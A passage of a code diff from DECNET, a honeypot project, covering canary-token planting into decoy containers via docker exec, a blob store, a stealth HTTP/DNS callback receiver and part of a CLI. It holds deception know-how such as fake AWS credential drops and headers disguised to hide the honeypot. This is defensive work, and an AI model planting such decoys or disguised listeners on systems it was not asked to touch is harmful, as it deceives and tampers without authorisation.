template = table.get(generator)
|
||||
if not template:
|
||||
# Unknown generator — fall back to a generic /tmp drop so the
|
||||
# planter still has somewhere to write. The API rejects
|
||||
# unknown generators upstream, so this branch is defensive.
|
||||
return f"/tmp/{generator}.canary" # nosec B108 — placement inside attacker-facing decoy container, not host /tmp
|
||||
return template.format(user=default_user(persona))
|
||||
|
||||
|
||||
def normalize_placement(path: str) -> str:
|
||||
"""Validate and normalize an operator-supplied placement path.
|
||||
|
||||
Forbids relative paths, NUL bytes, and shell metacharacters that
|
||||
``docker exec sh -c`` can't safely round-trip. Returns the
|
||||
sanitised path unchanged when valid; raises :class:`ValueError`
|
||||
otherwise so the API can return a 400 with a clear message.
|
||||
"""
|
||||
if not path or not path.startswith("/"):
|
||||
raise ValueError("placement_path must be absolute (start with '/')")
|
||||
if "\x00" in path:
|
||||
raise ValueError("placement_path may not contain NUL")
|
||||
if "\n" in path or "\r" in path:
|
||||
raise ValueError("placement_path may not contain newlines")
|
||||
if "../" in path or path.endswith("/.."):
|
||||
raise ValueError("placement_path may not contain '..' segments")
|
||||
return path
|
||||
@@ -1,301 +0,0 @@
|
||||
"""Plant / revoke canary artifacts inside running decky containers.
|
||||
|
||||
Single entry point per operation:
|
||||
|
||||
* :func:`plant` writes a :class:`CanaryArtifact` into one decky's
|
||||
filesystem via ``docker exec`` (mirroring the SSH driver's
|
||||
``_run_file`` pattern), backdates the mtime, sets the requested
|
||||
mode, and publishes ``canary.{token_id}.placed`` on the bus.
|
||||
* :func:`revoke` unlinks the file (best-effort) and publishes
|
||||
``canary.{token_id}.revoked``.
|
||||
* :func:`seed_baseline` is the deploy-hook helper: synthesises the
|
||||
configured baseline set for one decky, persists rows, plants each.
|
||||
Failures are logged but do **not** abort the deploy (the deployer
|
||||
hook calls this best-effort).
|
||||
|
||||
We don't reuse :class:`SSHDriver` directly because the orchestrator
|
||||
driver is tied to its action types (``FileAction`` carries str
|
||||
content; canary content is bytes). The planter takes the same
|
||||
shape but speaks bytes-via-base64 over the wire.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import os
|
||||
import shlex
|
||||
import time
|
||||
from secrets import token_urlsafe
|
||||
from typing import Any, Iterable, Optional
|
||||
|
||||
from decnet.bus import topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||
from decnet.canary.factory import get_generator
|
||||
from decnet.canary.paths import default_path_for
|
||||
from decnet.logging import get_logger
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
log = get_logger("canary.planter")
|
||||
|
||||
_DOCKER = "docker"
|
||||
_TIMEOUT = 8.0
|
||||
# Container suffix — matches the orchestrator SSH driver's convention
|
||||
# (``<decky_name>-ssh``). Canary placement always happens through the
|
||||
# ssh container because every decky has one and it carries the most
|
||||
# realistic filesystem layout.
|
||||
_SSH_CONTAINER_SUFFIX = "-ssh"
|
||||
|
||||
|
||||
def _container_for(decky_name: str) -> str:
|
||||
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||
|
||||
|
||||
def _dirname(path: str) -> str:
|
||||
idx = path.rfind("/")
|
||||
if idx <= 0:
|
||||
return "/"
|
||||
return path[:idx]
|
||||
|
||||
|
||||
async def _run(
|
||||
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
|
||||
) -> tuple[int, str, str]:
|
||||
try:
|
||||
proc = await asyncio.create_subprocess_exec(
|
||||
*argv,
|
||||
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
||||
stdout=asyncio.subprocess.PIPE,
|
||||
stderr=asyncio.subprocess.PIPE,
|
||||
)
|
||||
except FileNotFoundError as exc:
|
||||
return 127, "", f"argv[0] not found: {exc}"
|
||||
try:
|
||||
stdout, stderr = await asyncio.wait_for(
|
||||
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
|
||||
)
|
||||
except asyncio.TimeoutError:
|
||||
try:
|
||||
proc.kill()
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
return 124, "", "timeout"
|
||||
return (
|
||||
proc.returncode if proc.returncode is not None else -1,
|
||||
stdout.decode("utf-8", "replace"),
|
||||
stderr.decode("utf-8", "replace"),
|
||||
)
|
||||
|
||||
|
||||
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
|
||||
"""Compose the ``sh -c`` script + stdin payload for one artifact.
|
||||
|
||||
Binary safety: we base64-encode on the host and stream the result
|
||||
over stdin to ``base64 -d`` inside the container, so the bytes
|
||||
never touch the argv (kernel ARG_MAX would reject anything larger
|
||||
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
|
||||
and ``touch -d @<unix_ts>`` are present on every Linux base image
|
||||
we ship, so there's no per-distro branching.
|
||||
"""
|
||||
encoded = base64.b64encode(artifact.content)
|
||||
mtime = int(time.time() + artifact.mtime_offset)
|
||||
mode_str = oct(artifact.mode)[2:]
|
||||
parts = [
|
||||
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
|
||||
f"base64 -d > {shlex.quote(artifact.path)}",
|
||||
f"chmod {mode_str} {shlex.quote(artifact.path)}",
|
||||
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
|
||||
]
|
||||
return " && ".join(parts), encoded
|
||||
|
||||
|
||||
async def _publish(
|
||||
bus: Optional[BaseBus], topic: str, payload: dict[str, Any],
|
||||
) -> None:
|
||||
"""Best-effort publish — never raises.
|
||||
|
||||
When ``bus`` is None we resolve via :func:`get_bus`; either way
|
||||
bus-side failures are logged and swallowed (delivery is at-most-once
|
||||
by contract; the DB row is source of truth).
|
||||
"""
|
||||
try:
|
||||
owns_bus = bus is None
|
||||
target = bus if bus is not None else get_bus()
|
||||
if owns_bus:
|
||||
await target.connect()
|
||||
await target.publish(topic, payload)
|
||||
if owns_bus:
|
||||
await target.close()
|
||||
except Exception as e: # noqa: BLE001
|
||||
log.warning("canary bus publish failed topic=%s err=%s", topic, e)
|
||||
|
||||
|
||||
async def plant(
|
||||
decky_name: str,
|
||||
artifact: CanaryArtifact,
|
||||
*,
|
||||
token_uuid: str,
|
||||
repo: Optional[BaseRepository] = None,
|
||||
publish: bool = True,
|
||||
bus: Optional[BaseBus] = None,
|
||||
) -> tuple[bool, Optional[str]]:
|
||||
"""Write *artifact* into the decky's ssh container.
|
||||
|
||||
Returns ``(success, error_or_none)``. When ``repo`` is provided
|
||||
the token row's state is updated to ``planted`` / ``failed``
|
||||
accordingly. When ``publish`` is True a ``canary.<id>.placed``
|
||||
event is published on the bus on success.
|
||||
|
||||
The function never raises on docker errors — callers (the API,
|
||||
the deploy hook) treat the result as data.
|
||||
"""
|
||||
if not artifact.path:
|
||||
err = "planter requires a non-empty artifact.path"
|
||||
log.warning("canary.plant skipped: %s decky=%s token=%s", err, decky_name, token_uuid)
|
||||
if repo is not None:
|
||||
await repo.update_canary_token_state(token_uuid, "failed", err)
|
||||
return False, err
|
||||
|
||||
sh_cmd, stdin_payload = _build_plant_command(artifact)
|
||||
# ``-i`` keeps stdin attached so base64 -d inside the container can
|
||||
# consume the encoded payload streamed from the host.
|
||||
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
|
||||
success = rc == 0
|
||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
||||
|
||||
if repo is not None:
|
||||
if success:
|
||||
await repo.update_canary_token_state(token_uuid, "planted", None)
|
||||
else:
|
||||
await repo.update_canary_token_state(token_uuid, "failed", error)
|
||||
|
||||
if success and publish:
|
||||
await _publish(bus, topics.canary(token_uuid, topics.CANARY_PLACED), {
|
||||
"token_id": token_uuid,
|
||||
"decky_name": decky_name,
|
||||
"placement_path": artifact.path,
|
||||
"instrumenter": artifact.instrumenter,
|
||||
"generator": artifact.generator,
|
||||
})
|
||||
|
||||
if not success:
|
||||
log.warning(
|
||||
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
|
||||
decky_name, token_uuid, rc, stderr[:120],
|
||||
)
|
||||
return success, error
|
||||
|
||||
|
||||
async def revoke(
|
||||
decky_name: str,
|
||||
placement_path: str,
|
||||
*,
|
||||
token_uuid: str,
|
||||
repo: Optional[BaseRepository] = None,
|
||||
publish: bool = True,
|
||||
bus: Optional[BaseBus] = None,
|
||||
) -> tuple[bool, Optional[str]]:
|
||||
"""Best-effort unlink + state transition + bus publish.
|
||||
|
||||
Returns ``(success, error_or_none)``. ``success`` is True when
|
||||
the file is gone after the call (whether we deleted it or it was
|
||||
already missing); only docker / container-down errors return False.
|
||||
"""
|
||||
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
|
||||
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run(argv)
|
||||
success = rc == 0
|
||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
||||
|
||||
if repo is not None:
|
||||
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
||||
|
||||
if publish:
|
||||
await _publish(bus, topics.canary(token_uuid, topics.CANARY_REVOKED), {
|
||||
"token_id": token_uuid,
|
||||
"decky_name": decky_name,
|
||||
"placement_path": placement_path,
|
||||
})
|
||||
|
||||
return success, error
|
||||
|
||||
|
||||
def _baseline_set() -> Iterable[str]:
|
||||
"""Return the configured baseline generator names.
|
||||
|
||||
Honors ``DECNET_CANARY_BASELINE`` (comma-separated). Default is
|
||||
a sensible mix that exercises every callback-bearing generator
|
||||
plus a passive aws_creds drop for realism.
|
||||
"""
|
||||
raw = os.environ.get(
|
||||
"DECNET_CANARY_BASELINE",
|
||||
"git_config,env_file,honeydoc,aws_creds",
|
||||
)
|
||||
return [n.strip() for n in raw.split(",") if n.strip()]
|
||||
|
||||
|
||||
def _ctx_for(slug: str) -> CanaryContext:
|
||||
"""Build a :class:`CanaryContext` from the canary worker config."""
|
||||
base = os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088")
|
||||
zone = os.environ.get("DECNET_CANARY_DNS_ZONE", "")
|
||||
return CanaryContext(callback_token=slug, http_base=base, dns_zone=zone)
|
||||
|
||||
|
||||
async def seed_baseline(
|
||||
decky_name: str,
|
||||
repo: BaseRepository,
|
||||
*,
|
||||
persona: str = "linux",
|
||||
created_by: str = "system",
|
||||
bus: Optional[BaseBus] = None,
|
||||
) -> list[dict[str, Any]]:
|
||||
"""Plant the configured baseline canary set on one decky.
|
||||
|
||||
Best-effort: any individual placement that fails is logged and
|
||||
the row is left in ``state=failed``; the deployer hook treats the
|
||||
return value as informational, not authoritative.
|
||||
|
||||
Returns the list of token rows created (whether their planting
|
||||
ultimately succeeded or not), so the caller can surface them in
|
||||
the deploy report.
|
||||
"""
|
||||
out: list[dict[str, Any]] = []
|
||||
for gen_name in _baseline_set():
|
||||
try:
|
||||
generator = get_generator(gen_name)
|
||||
except ValueError:
|
||||
log.warning("canary.seed_baseline: unknown generator %r — skipping", gen_name)
|
||||
continue
|
||||
slug = token_urlsafe(16)
|
||||
ctx = _ctx_for(slug)
|
||||
artifact = generator.generate(ctx)
|
||||
artifact.path = default_path_for(gen_name, persona)
|
||||
kind = "aws_passive" if gen_name == "aws_creds" else "http"
|
||||
# Persist first so the planter has a row to update; that way a
|
||||
# crash mid-plant leaves a recoverable failed-state row.
|
||||
from uuid import uuid4
|
||||
token_uuid = str(uuid4())
|
||||
await repo.create_canary_token({
|
||||
"uuid": token_uuid,
|
||||
"kind": kind,
|
||||
"decky_name": decky_name,
|
||||
"blob_uuid": None,
|
||||
"instrumenter": None,
|
||||
"generator": gen_name,
|
||||
"placement_path": artifact.path,
|
||||
"callback_token": slug,
|
||||
"secret_seed": slug,
|
||||
"created_by": created_by,
|
||||
"state": "planted", # optimistic — plant() flips to failed on error
|
||||
})
|
||||
await plant(
|
||||
decky_name, artifact,
|
||||
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
||||
)
|
||||
out.append({
|
||||
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
||||
"callback_token": slug, "placement_path": artifact.path,
|
||||
})
|
||||
return out
|
||||
@@ -1,89 +0,0 @@
|
||||
"""Filesystem store for operator-uploaded canary blobs.
|
||||
|
||||
Blobs live under ``/var/lib/decnet/canary/blobs/<sha256>`` (override
|
||||
via ``DECNET_CANARY_BLOB_DIR``) and are deduplicated by content hash.
|
||||
The DB table :class:`decnet.web.db.models.CanaryBlob` mirrors
|
||||
metadata; the bytes are read on demand at instrumentation time, so
|
||||
the API process never holds large operator uploads in memory longer
|
||||
than the request itself.
|
||||
|
||||
Refcount-aware deletion is enforced at the DB layer (see
|
||||
:meth:`decnet.web.db.repository.BaseRepository.delete_canary_blob`);
|
||||
this module only provides write/read/unlink primitives keyed by
|
||||
sha256.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import os
|
||||
from pathlib import Path
|
||||
from typing import Tuple
|
||||
|
||||
|
||||
def blob_dir() -> Path:
|
||||
"""Return the on-disk root for canary blobs.
|
||||
|
||||
Honors ``DECNET_CANARY_BLOB_DIR`` so tests can point at a tmp
|
||||
path. The directory is created lazily on first write.
|
||||
"""
|
||||
raw = os.environ.get("DECNET_CANARY_BLOB_DIR", "/var/lib/decnet/canary/blobs")
|
||||
return Path(raw)
|
||||
|
||||
|
||||
def _path_for(sha256: str) -> Path:
|
||||
# Two-level fan-out (``ab/cd/abcd...``) keeps any one directory
|
||||
# from accumulating thousands of entries on busy fleets. Same
|
||||
# shape as Git's loose-object store.
|
||||
if len(sha256) < 4:
|
||||
raise ValueError("sha256 must be at least 4 chars")
|
||||
root = blob_dir()
|
||||
return root / sha256[:2] / sha256[2:4] / sha256
|
||||
|
||||
|
||||
def write_blob(content: bytes) -> Tuple[str, Path, int]:
|
||||
"""Persist ``content`` under its sha256 path.
|
||||
|
||||
Idempotent: if the target file already exists with the same
|
||||
bytes, no rewrite happens. Returns ``(sha256, path,
|
||||
size_bytes)``.
|
||||
"""
|
||||
sha = hashlib.sha256(content).hexdigest()
|
||||
target = _path_for(sha)
|
||||
target.parent.mkdir(parents=True, exist_ok=True)
|
||||
if not target.exists():
|
||||
# Atomic-ish: write to a temp sibling and rename. Avoids the
|
||||
# half-written-file race a concurrent reader would otherwise
|
||||
# see if we wrote in place.
|
||||
tmp = target.with_suffix(target.suffix + ".part")
|
||||
tmp.write_bytes(content)
|
||||
os.replace(tmp, target)
|
||||
return sha, target, len(content)
|
||||
|
||||
|
||||
def read_blob(sha256: str) -> bytes:
|
||||
"""Read the bytes for a stored blob.
|
||||
|
||||
Raises :class:`FileNotFoundError` when the on-disk row was unlinked
|
||||
out of band (operator pruned ``/var/lib/decnet`` by hand) — the
|
||||
caller (instrumenter dispatch) surfaces it as a 410-ish error so
|
||||
the operator can re-upload.
|
||||
"""
|
||||
return _path_for(sha256).read_bytes()
|
||||
|
||||
|
||||
def unlink_blob(sha256: str) -> bool:
|
||||
"""Delete the on-disk bytes for ``sha256``.
|
||||
|
||||
Returns True if a file was removed, False if it was already gone.
|
||||
The DB row deletion happens in
|
||||
:meth:`SQLModelRepository.delete_canary_blob`; this function is
|
||||
a best-effort companion called *after* the DB delete commits so
|
||||
a crash between them leaves a recoverable orphan, never a
|
||||
dangling DB reference.
|
||||
"""
|
||||
target = _path_for(sha256)
|
||||
try:
|
||||
target.unlink()
|
||||
except FileNotFoundError:
|
||||
return False
|
||||
return True
|
||||
@@ -1,254 +0,0 @@
|
||||
"""``decnet canary`` worker — HTTP + DNS callback receivers.
|
||||
|
||||
Two surfaces, one process:
|
||||
|
||||
* **HTTP** — a tiny FastAPI app on its own port (default 8088). The
|
||||
only useful route is ``GET /c/{slug}`` which looks up the slug in
|
||||
the canary token table, persists a :class:`CanaryTrigger` row,
|
||||
publishes ``canary.<token_id>.triggered`` on the bus, and returns
|
||||
a 1×1 transparent GIF (or 204 if the client's ``Accept`` doesn't
|
||||
list any image type).
|
||||
* **DNS** — an authoritative UDP server (default 5353 if non-root,
|
||||
53 if root) for ``*.<canary_zone>``. Same lookup + persist +
|
||||
publish flow, plus a sinkhole A record so the attacker's resolver
|
||||
doesn't loop on NXDOMAIN.
|
||||
|
||||
Both surfaces are **stealth** by policy
|
||||
(:mod:`feedback_stealth`): no DECNET strings in headers / banners /
|
||||
error pages. The HTTP app strips the default ``Server: uvicorn``
|
||||
header in middleware; FastAPI's docs/openapi UI is disabled because
|
||||
discovering them would tip off the attacker that this is a honeypot.
|
||||
|
||||
The worker is supervised by its own systemd unit
|
||||
(``decnet-canary.service``); like every other DECNET worker, it
|
||||
crashes loudly rather than masking failures.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
|
||||
from fastapi import FastAPI, Request, Response
|
||||
|
||||
from decnet.bus import topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.canary.dns_server import CanaryDNSProtocol, DNSQuery
|
||||
from decnet.logging import get_logger
|
||||
from decnet.web.db.factory import get_repository
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
log = get_logger("canary.worker")
|
||||
|
||||
# 1×1 transparent GIF — public-domain canonical bytes. Returning the
|
||||
# same image every time is fine: the body has no information the
|
||||
# attacker shouldn't see, and image clients cache it.
|
||||
_TRANSPARENT_GIF = bytes.fromhex(
|
||||
"47494638396101000100800100000000ffffff21f90401000001002c00000000010001000002024401003b"
|
||||
)
|
||||
|
||||
|
||||
def _http_base() -> str:
|
||||
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
||||
|
||||
|
||||
def _dns_zone() -> str:
|
||||
return os.environ.get("DECNET_CANARY_DNS_ZONE", "").strip(".").lower()
|
||||
|
||||
|
||||
def _http_port() -> int:
|
||||
return int(os.environ.get("DECNET_CANARY_HTTP_PORT", "8088"))
|
||||
|
||||
|
||||
def _dns_port() -> int:
|
||||
# Default 5353 (mDNS-ish, non-privileged) — operators pin :53 via
|
||||
# NAT or a CAP_NET_BIND_SERVICE-enabled unit.
|
||||
return int(os.environ.get("DECNET_CANARY_DNS_PORT", "5353"))
|
||||
|
||||
|
||||
def _dns_bind() -> str:
|
||||
return os.environ.get("DECNET_CANARY_DNS_BIND", "0.0.0.0") # nosec B104 — attacker-facing decoy listener, internet exposure is the design
|
||||
|
||||
|
||||
def _http_bind() -> str:
|
||||
return os.environ.get("DECNET_CANARY_HTTP_BIND", "0.0.0.0") # nosec B104 — same rationale
|
||||
|
||||
|
||||
# ---------------------------- HTTP surface --------------------------------
|
||||
|
||||
|
||||
def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
||||
"""Construct the FastAPI app.
|
||||
|
||||
Disables docs / openapi / redoc — operators query the canary
|
||||
surface via the *main* DECNET API, never directly. Anyone hitting
|
||||
these paths is either misconfigured or scanning for a honeypot.
|
||||
"""
|
||||
app = FastAPI(
|
||||
title="", # don't leak "DECNET" in OpenAPI
|
||||
docs_url=None, redoc_url=None, openapi_url=None,
|
||||
)
|
||||
|
||||
@app.middleware("http")
|
||||
async def _stealth_headers(request: Request, call_next):
|
||||
response: Response = await call_next(request)
|
||||
# Strip the uvicorn / starlette banner; replace with a
|
||||
# generic Server line that matches what most CDNs return.
|
||||
response.headers["Server"] = "nginx"
|
||||
# Don't leak request id / process id headers.
|
||||
if "x-process-time" in response.headers:
|
||||
del response.headers["x-process-time"]
|
||||
return response
|
||||
|
||||
@app.get("/c/{slug}")
|
||||
async def callback(slug: str, request: Request) -> Response:
|
||||
await _record_hit(
|
||||
repo, bus,
|
||||
slug=slug,
|
||||
src_ip=_client_ip(request),
|
||||
user_agent=request.headers.get("user-agent"),
|
||||
request_path=str(request.url.path),
|
||||
dns_qname=None,
|
||||
raw_headers=dict(request.headers),
|
||||
)
|
||||
# Always 200 with a tiny image so the attacker's client sees
|
||||
# a "success" — same return regardless of whether the slug is
|
||||
# known. Stealth: do NOT distinguish unknown vs known via
|
||||
# status code or response body.
|
||||
return Response(content=_TRANSPARENT_GIF, media_type="image/gif")
|
||||
|
||||
@app.get("/")
|
||||
async def root() -> Response:
|
||||
# Bare root returns a generic 404. The decoy posture: pretend
|
||||
# to be an empty static-file host that just happens to resolve
|
||||
# /c/<slug> when it matches.
|
||||
return Response(status_code=404)
|
||||
|
||||
return app
|
||||
|
||||
|
||||
def _client_ip(request: Request) -> str:
|
||||
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
||||
# proxy. Take the leftmost address in the chain; everything after
|
||||
# is upstream-proxy noise.
|
||||
fwd = request.headers.get("x-forwarded-for")
|
||||
if fwd:
|
||||
return fwd.split(",", 1)[0].strip()
|
||||
if request.client:
|
||||
return request.client.host
|
||||
return "0.0.0.0" # nosec B104 — sentinel for "unknown remote"
|
||||
|
||||
|
||||
# ---------------------------- shared persistence -------------------------
|
||||
|
||||
|
||||
async def _record_hit(
|
||||
repo: BaseRepository,
|
||||
bus: BaseBus,
|
||||
*,
|
||||
slug: str,
|
||||
src_ip: str,
|
||||
user_agent: Optional[str],
|
||||
request_path: Optional[str],
|
||||
dns_qname: Optional[str],
|
||||
raw_headers: Optional[dict],
|
||||
) -> None:
|
||||
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
||||
|
||||
Unknown slugs are silently swallowed: returning the same response
|
||||
for known and unknown slugs is the stealth posture, and persisting
|
||||
every random scan would clutter the DB.
|
||||
"""
|
||||
token = await repo.get_canary_token_by_slug(slug)
|
||||
if token is None:
|
||||
return
|
||||
trigger_id = await repo.record_canary_trigger({
|
||||
"token_uuid": token["uuid"],
|
||||
"occurred_at": datetime.now(timezone.utc),
|
||||
"src_ip": src_ip,
|
||||
"user_agent": user_agent,
|
||||
"request_path": request_path,
|
||||
"dns_qname": dns_qname,
|
||||
"raw_headers": raw_headers or {},
|
||||
})
|
||||
try:
|
||||
await bus.publish(
|
||||
topics.canary(token["uuid"], topics.CANARY_TRIGGERED),
|
||||
{
|
||||
"token_id": token["uuid"],
|
||||
"trigger_id": trigger_id,
|
||||
"decky_name": token["decky_name"],
|
||||
"src_ip": src_ip,
|
||||
"user_agent": user_agent,
|
||||
"request_path": request_path,
|
||||
"dns_qname": dns_qname,
|
||||
},
|
||||
)
|
||||
except Exception as e: # noqa: BLE001 — best effort
|
||||
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
||||
|
||||
|
||||
# ---------------------------- DNS surface --------------------------------
|
||||
|
||||
|
||||
async def _start_dns_server(
|
||||
repo: BaseRepository, bus: BaseBus, *, loop: asyncio.AbstractEventLoop,
|
||||
) -> Optional[asyncio.DatagramTransport]:
|
||||
zone = _dns_zone()
|
||||
if not zone:
|
||||
log.info("canary.dns disabled (DECNET_CANARY_DNS_ZONE unset)")
|
||||
return None
|
||||
|
||||
async def _hook(slug: str, query: DNSQuery, src_ip: str) -> None:
|
||||
await _record_hit(
|
||||
repo, bus,
|
||||
slug=slug, src_ip=src_ip, user_agent=None,
|
||||
request_path=None, dns_qname=query.qname,
|
||||
raw_headers=None,
|
||||
)
|
||||
|
||||
transport, _proto = await loop.create_datagram_endpoint(
|
||||
lambda: CanaryDNSProtocol(zone, _hook),
|
||||
local_addr=(_dns_bind(), _dns_port()),
|
||||
)
|
||||
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
|
||||
return transport # type: ignore[return-value]
|
||||
|
||||
|
||||
# ---------------------------- entry point --------------------------------
|
||||
|
||||
|
||||
async def run() -> None:
|
||||
"""Worker entry point — kicked off by ``decnet canary``."""
|
||||
import uvicorn
|
||||
|
||||
repo = get_repository()
|
||||
await repo.initialize()
|
||||
bus = get_bus()
|
||||
await bus.connect()
|
||||
|
||||
app = _build_app(repo, bus)
|
||||
config = uvicorn.Config(
|
||||
app,
|
||||
host=_http_bind(),
|
||||
port=_http_port(),
|
||||
log_level="warning",
|
||||
access_log=False, # stealth: no per-request lines
|
||||
server_header=False, # we set Server: nginx in middleware
|
||||
)
|
||||
server = uvicorn.Server(config)
|
||||
loop = asyncio.get_running_loop()
|
||||
dns_transport = await _start_dns_server(repo, bus, loop=loop)
|
||||
try:
|
||||
await server.serve()
|
||||
finally:
|
||||
if dns_transport is not None:
|
||||
dns_transport.close()
|
||||
await bus.close()
|
||||
|
||||
|
||||
def main() -> None:
|
||||
"""CLI entry point — synchronous wrapper for ``asyncio.run``."""
|
||||
asyncio.run(run())
|
||||
461
decnet/cli.py
Normal file
461
decnet/cli.py
Normal file
@@ -0,0 +1,461 @@
|
||||
"""
|
||||
DECNET CLI — entry point for all commands.
|
||||
|
||||
Usage:
|
||||
decnet deploy --mode unihost --deckies 5 --randomize-services
|
||||
decnet status
|
||||
decnet teardown [--all | --id decky-01]
|
||||
decnet services
|
||||
"""
|
||||
|
||||
import random
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.console import Console
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.archetypes import Archetype, all_archetypes, get_archetype
|
||||
from decnet.config import (
|
||||
DeckyConfig,
|
||||
DecnetConfig,
|
||||
random_hostname,
|
||||
)
|
||||
from decnet.distros import all_distros, get_distro, random_distro
|
||||
from decnet.ini_loader import IniConfig, load_ini
|
||||
from decnet.network import detect_interface, detect_subnet, allocate_ips, get_host_ip
|
||||
from decnet.services.registry import all_services
|
||||
|
||||
app = typer.Typer(
|
||||
name="decnet",
|
||||
help="Deploy a deception network of honeypot deckies on your LAN.",
|
||||
no_args_is_help=True,
|
||||
)
|
||||
console = Console()
|
||||
|
||||
def _all_service_names() -> list[str]:
|
||||
"""Return all registered service names from the live plugin registry."""
|
||||
return sorted(all_services().keys())
|
||||
|
||||
|
||||
def _resolve_distros(
|
||||
distros_explicit: list[str] | None,
|
||||
randomize_distros: bool,
|
||||
n: int,
|
||||
archetype: Archetype | None = None,
|
||||
) -> list[str]:
|
||||
"""Return a list of n distro slugs based on CLI flags or archetype preference."""
|
||||
if distros_explicit:
|
||||
return [distros_explicit[i % len(distros_explicit)] for i in range(n)]
|
||||
if randomize_distros:
|
||||
return [random_distro().slug for _ in range(n)]
|
||||
if archetype:
|
||||
pool = archetype.preferred_distros
|
||||
return [pool[i % len(pool)] for i in range(n)]
|
||||
# Default: cycle through all distros to maximize heterogeneity
|
||||
slugs = list(all_distros().keys())
|
||||
return [slugs[i % len(slugs)] for i in range(n)]
|
||||
|
||||
|
||||
def _build_deckies(
|
||||
n: int,
|
||||
ips: list[str],
|
||||
services_explicit: list[str] | None,
|
||||
randomize_services: bool,
|
||||
distros_explicit: list[str] | None = None,
|
||||
randomize_distros: bool = False,
|
||||
archetype: Archetype | None = None,
|
||||
) -> list[DeckyConfig]:
|
||||
deckies = []
|
||||
used_combos: set[frozenset] = set()
|
||||
distro_slugs = _resolve_distros(distros_explicit, randomize_distros, n, archetype)
|
||||
|
||||
for i, ip in enumerate(ips):
|
||||
name = f"decky-{i + 1:02d}"
|
||||
distro = get_distro(distro_slugs[i])
|
||||
hostname = random_hostname(distro.slug)
|
||||
|
||||
if services_explicit:
|
||||
svc_list = services_explicit
|
||||
elif archetype:
|
||||
svc_list = list(archetype.services)
|
||||
elif randomize_services:
|
||||
svc_pool = _all_service_names()
|
||||
attempts = 0
|
||||
while True:
|
||||
count = random.randint(1, min(3, len(svc_pool)))
|
||||
chosen = frozenset(random.sample(svc_pool, count))
|
||||
attempts += 1
|
||||
if chosen not in used_combos or attempts > 20:
|
||||
break
|
||||
svc_list = list(chosen)
|
||||
used_combos.add(chosen)
|
||||
else:
|
||||
typer.echo("Error: provide --services, --archetype, or --randomize-services.", err=True)
|
||||
raise typer.Exit(1)
|
||||
|
||||
deckies.append(
|
||||
DeckyConfig(
|
||||
name=name,
|
||||
ip=ip,
|
||||
services=svc_list,
|
||||
distro=distro.slug,
|
||||
base_image=distro.image,
|
||||
build_base=distro.build_base,
|
||||
hostname=hostname,
|
||||
archetype=archetype.slug if archetype else None,
|
||||
nmap_os=archetype.nmap_os if archetype else "linux",
|
||||
)
|
||||
)
|
||||
return deckies
|
||||
|
||||
|
||||
def _build_deckies_from_ini(
|
||||
ini: IniConfig,
|
||||
subnet_cidr: str,
|
||||
gateway: str,
|
||||
host_ip: str,
|
||||
randomize: bool,
|
||||
) -> list[DeckyConfig]:
|
||||
"""Build DeckyConfig list from an IniConfig, auto-allocating missing IPs."""
|
||||
from ipaddress import IPv4Address, IPv4Network
|
||||
|
||||
explicit_ips: set[IPv4Address] = {
|
||||
IPv4Address(s.ip) for s in ini.deckies if s.ip
|
||||
}
|
||||
|
||||
net = IPv4Network(subnet_cidr, strict=False)
|
||||
reserved = {
|
||||
net.network_address,
|
||||
net.broadcast_address,
|
||||
IPv4Address(gateway),
|
||||
IPv4Address(host_ip),
|
||||
} | explicit_ips
|
||||
|
||||
auto_pool = (str(addr) for addr in net.hosts() if addr not in reserved)
|
||||
|
||||
deckies: list[DeckyConfig] = []
|
||||
for spec in ini.deckies:
|
||||
# Resolve archetype (if any) — explicit services/distro override it
|
||||
arch: Archetype | None = None
|
||||
if spec.archetype:
|
||||
try:
|
||||
arch = get_archetype(spec.archetype)
|
||||
except ValueError as e:
|
||||
console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
# Distro: archetype preferred list → random → global cycle
|
||||
distro_pool = arch.preferred_distros if arch else list(all_distros().keys())
|
||||
distro = get_distro(distro_pool[len(deckies) % len(distro_pool)])
|
||||
hostname = random_hostname(distro.slug)
|
||||
|
||||
ip = spec.ip or next(auto_pool, None)
|
||||
if ip is None:
|
||||
